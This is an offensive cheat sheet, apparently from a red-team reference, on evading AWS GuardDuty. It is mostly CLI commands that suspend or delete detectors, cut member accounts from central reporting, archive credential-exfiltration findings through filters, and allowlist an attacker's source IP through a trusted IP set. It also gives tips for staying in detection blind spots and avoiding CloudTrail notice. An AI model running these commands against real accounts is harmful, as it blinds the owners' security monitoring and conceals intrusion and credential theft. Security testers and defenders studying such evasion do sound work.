GuardDuty scores CloudTrail, VPC flow, and DNS activity for known-bad behavior. It is defeated two ways: switch it off (loud, and itself a finding), or stay inside its blind spots so it never fires.
Disable or delete the detector#
aws guardduty list-detectors
aws guardduty update-detector --detector-id <id> --no-enable # suspend analysis
aws guardduty delete-detector --detector-id <id> # remove entirely
# in a delegated-admin setup, cut a member loose from central reporting
aws guardduty disassociate-from-administrator-account --detector-id <id>
Auto-archive the findings you expect to trip#
# a filter with ARCHIVE silently files matching findings away from the console
aws guardduty create-filter --detector-id <id> --name quiet --action ARCHIVE \
--finding-criteria '{"Criterion":{"type":{"Eq":["UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration"]}}}'
Allowlist your source IP#
GuardDuty suppresses findings that originate from a trusted IP set. Uploading one that contains your source address quietly removes a whole class of findings without the detector ever looking disabled:
# a trusted IP list (one CIDR per line in the S3 object) excludes those IPs from analysis
aws guardduty create-ip-set --detector-id <id> --name ops --format TXT \
--location https://s3.amazonaws.com/<bucket>/trusted.txt --activate
Stay in the blind spots#
- Call the API from inside the account's expected regions and from an EC2 role rather than external keys, so credential-exfiltration analytics do not trip.
- Avoid Tor, known-malicious IPs, and the
GeneratedFindingForpentest patterns GuardDuty ships sample rules for. - Use IMDSv2 and existing roles instead of patterns that match
InstanceCredentialExfiltration.
Exploitation notes#
- Disabling or deleting a detector is a management event CloudTrail records, so pair it with the CloudTrail work or expect it to surface.
- Filters are quieter than deletion: the service stays "enabled" while the findings you generate are archived out of view.
- GuardDuty is regional; a detector exists per region, so enumerate and handle each region in scope.
Tools#
- AWS CLI (
guardduty): detector and filter control. - Pacu (
detection__enum_services,detection__disruption): find and disable detection services. - Stratus Red Team: GuardDuty detector-deletion detonation.